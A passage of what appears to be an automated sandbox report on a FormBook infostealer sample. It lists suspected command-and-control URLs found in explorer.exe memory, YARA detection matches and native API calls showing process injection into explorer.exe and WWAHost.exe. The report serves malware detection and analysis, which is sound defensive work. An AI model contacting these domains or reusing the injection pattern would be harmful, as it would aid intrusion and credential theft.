          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.productivagc.com/na10/www.dexcoenergy.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.productivagc.comReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sasoera.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sasoera.com/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sasoera.com/na10/www.liamcollinai.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sasoera.comReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snykee.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snykee.com/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snykee.com/na10/www.awclog.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snykee.comReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelonelyteacup.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelonelyteacup.com/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelonelyteacup.com/na10/www.snykee.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelonelyteacup.comReferer:
          Source: explorer.exe, 00000007.00000002.3305263776.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2508398700.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000007.00000002.3299618126.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000007.00000002.3299618126.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2499817163.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000007.00000000.2498190628.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651889553.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3296372597.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009B86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009D42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000007.00000000.2508398700.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3305263776.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.3301684101.0000000009270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: yaM8XR1HfL.exe PID: 1288, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: WWAHost.exe PID: 4424, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2B60 NtClose,LdrInitializeThunk,4_2_014C2B60
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_014C2BF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2AD0 NtReadFile,LdrInitializeThunk,4_2_014C2AD0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_014C2D10
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_014C2D30
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2DD0 NtDelayExecution,LdrInitializeThunk,4_2_014C2DD0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_014C2DF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_014C2C70
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_014C2CA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2F30 NtCreateSection,LdrInitializeThunk,4_2_014C2F30
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2FE0 NtCreateFile,LdrInitializeThunk,4_2_014C2FE0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2F90 NtProtectVirtualMemory,LdrInitializeThunk,4_2_014C2F90
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2FB0 NtResumeThread,LdrInitializeThunk,4_2_014C2FB0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_014C2E80
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_014C2EA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C4340 NtSetContextThread,4_2_014C4340
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C4650 NtSuspendThread,4_2_014C4650
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2BE0 NtQueryValueKey,4_2_014C2BE0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2B80 NtQueryInformationFile,4_2_014C2B80
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2BA0 NtEnumerateValueKey,4_2_014C2BA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2AF0 NtWriteFile,4_2_014C2AF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2AB0 NtWaitForSingleObject,4_2_014C2AB0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2D00 NtSetInformationFile,4_2_014C2D00
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2DB0 NtEnumerateKey,4_2_014C2DB0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2C60 NtCreateKey,4_2_014C2C60
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2C00 NtQueryInformationProcess,4_2_014C2C00
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2CC0 NtQueryVirtualMemory,4_2_014C2CC0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2CF0 NtOpenProcess,4_2_014C2CF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2F60 NtCreateProcessEx,4_2_014C2F60
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2FA0 NtQuerySection,4_2_014C2FA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2E30 NtWriteVirtualMemory,4_2_014C2E30
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2EE0 NtQueueApcThread,4_2_014C2EE0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C3010 NtOpenDirectoryObject,4_2_014C3010
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C3090 NtSetValueKey,4_2_014C3090
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C35C0 NtCreateMutant,4_2_014C35C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C39B0 NtGetContextThread,4_2_014C39B0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C3D70 NtOpenThread,4_2_014C3D70
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C3D10 NtOpenProcessToken,4_2_014C3D10
          Source: C:\Windows\explorer.exeCode function: 7_2_09258232 NtCreateFile,7_2_09258232
          Source: C:\Windows\explorer.exeCode function: 7_2_09259E12 NtProtectVirtualMemory,7_2_09259E12
          Source: C:\Windows\explorer.exeCode function: 7_2_09259E0A NtProtectVirtualMemory,7_2_09259E0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0014E0F0 GetCurrentProcess,NtQueryInformationProcess,QuirkIsEnabled,#90,InitOnceExecuteOnce,#157,9_2_0014E0F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001A3774 GetCurrentProcess,NtSetInformationProcess,9_2_001A3774
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001A37AC NtQuerySystemInformation,9_2_001A37AC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00147E90 NtQueryInformationToken,HeapAlloc,memset,NtQueryInformationToken,RtlInitUnicodeString,RtlCompareUnicodeString,RtlNtStatusToDosErrorNoTeb,RtlNtStatusToDosErrorNoTeb,HeapFree,9_2_00147E90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2C60 NtCreateKey,LdrInitializeThunk,9_2_040C2C60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_040C2C70
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_040C2CA0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_040C2D10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2DD0 NtDelayExecution,LdrInitializeThunk,9_2_040C2DD0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_040C2DF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_040C2EA0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2F30 NtCreateSection,LdrInitializeThunk,9_2_040C2F30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2FE0 NtCreateFile,LdrInitializeThunk,9_2_040C2FE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2AD0 NtReadFile,LdrInitializeThunk,9_2_040C2AD0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2B60 NtClose,LdrInitializeThunk,9_2_040C2B60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2BE0 NtQueryValueKey,LdrInitializeThunk,9_2_040C2BE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_040C2BF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C35C0 NtCreateMutant,LdrInitializeThunk,9_2_040C35C0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C4650 NtSuspendThread,9_2_040C4650
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C4340 NtSetContextThread,9_2_040C4340
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2C00 NtQueryInformationProcess,9_2_040C2C00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2CC0 NtQueryVirtualMemory,9_2_040C2CC0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2CF0 NtOpenProcess,9_2_040C2CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2D00 NtSetInformationFile,9_2_040C2D00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2D30 NtUnmapViewOfSection,9_2_040C2D30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2DB0 NtEnumerateKey,9_2_040C2DB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2E30 NtWriteVirtualMemory,9_2_040C2E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2E80 NtReadVirtualMemory,9_2_040C2E80
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2EE0 NtQueueApcThread,9_2_040C2EE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2F60 NtCreateProcessEx,9_2_040C2F60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2F90 NtProtectVirtualMemory,9_2_040C2F90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2FA0 NtQuerySection,9_2_040C2FA0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2FB0 NtResumeThread,9_2_040C2FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2AB0 NtWaitForSingleObject,9_2_040C2AB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040C2AF0 NtWriteFile,9_2_040C2AF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07685CA0 CreateProcessAsUserW,0_2_07685CA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_00EA65E80_2_00EA65E8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_00EA74D80_2_00EA74D8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_00EABF440_2_00EABF44
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_00EA29680_2_00EA2968
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_00EABFB10_2_00EABFB1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07211C680_2_07211C68
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0721C4AD0_2_0721C4AD
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0721C4E00_2_0721C4E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0721D98D0_2_0721D98D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0721D9C80_2_0721D9C8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_075677500_2_07567750
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_075693600_2_07569360
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756B3680_2_0756B368
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07569A880_2_07569A88
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756B9400_2_0756B940
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756A4590_2_0756A459
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756E8010_2_0756E801
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_075693500_2_07569350
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756B3360_2_0756B336
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_075687210_2_07568721
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756F7980_2_0756F798
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756F7A80_2_0756F7A8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756C2100_2_0756C210
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756C2010_2_0756C201
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756CE080_2_0756CE08
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756DAD00_2_0756DAD0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756D6B00_2_0756D6B0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756EAB00_2_0756EAB0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756EAA20_2_0756EAA2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756D6A00_2_0756D6A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756F1400_2_0756F140
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756F1300_2_0756F130
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756CDF80_2_0756CDF8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756D4780_2_0756D478
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756D4680_2_0756D468
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_075600060_2_07560006
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0756D0F80_2_0756D0F8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07680FDA0_2_07680FDA
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07689E300_2_07689E30
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07684B590_2_07684B59
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_076802200_2_07680220
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_076862380_2_07686238
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_076800400_2_07680040
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07683EA00_2_07683EA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07683E910_2_07683E91
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_076845C00_2_076845C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_076845D00_2_076845D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_0768B4700_2_0768B470
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07682CE00_2_07682CE0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07682CD00_2_07682CD0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07686B1F0_2_07686B1F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07684B880_2_07684B88
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_076862310_2_07686231
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_076802100_2_07680210
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_076800060_2_07680006
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_076840990_2_07684099
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07B725C80_2_07B725C8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07B7A9240_2_07B7A924
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07B725B80_2_07B725B8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07B7C4F00_2_07B7C4F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07CD27080_2_07CD2708
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07CDD6480_2_07CDD648
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07CDD6390_2_07CDD639
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07CDC0D00_2_07CDC0D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07211C510_2_07211C51
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015181584_2_01518158
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014801004_2_01480100
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152A1184_2_0152A118
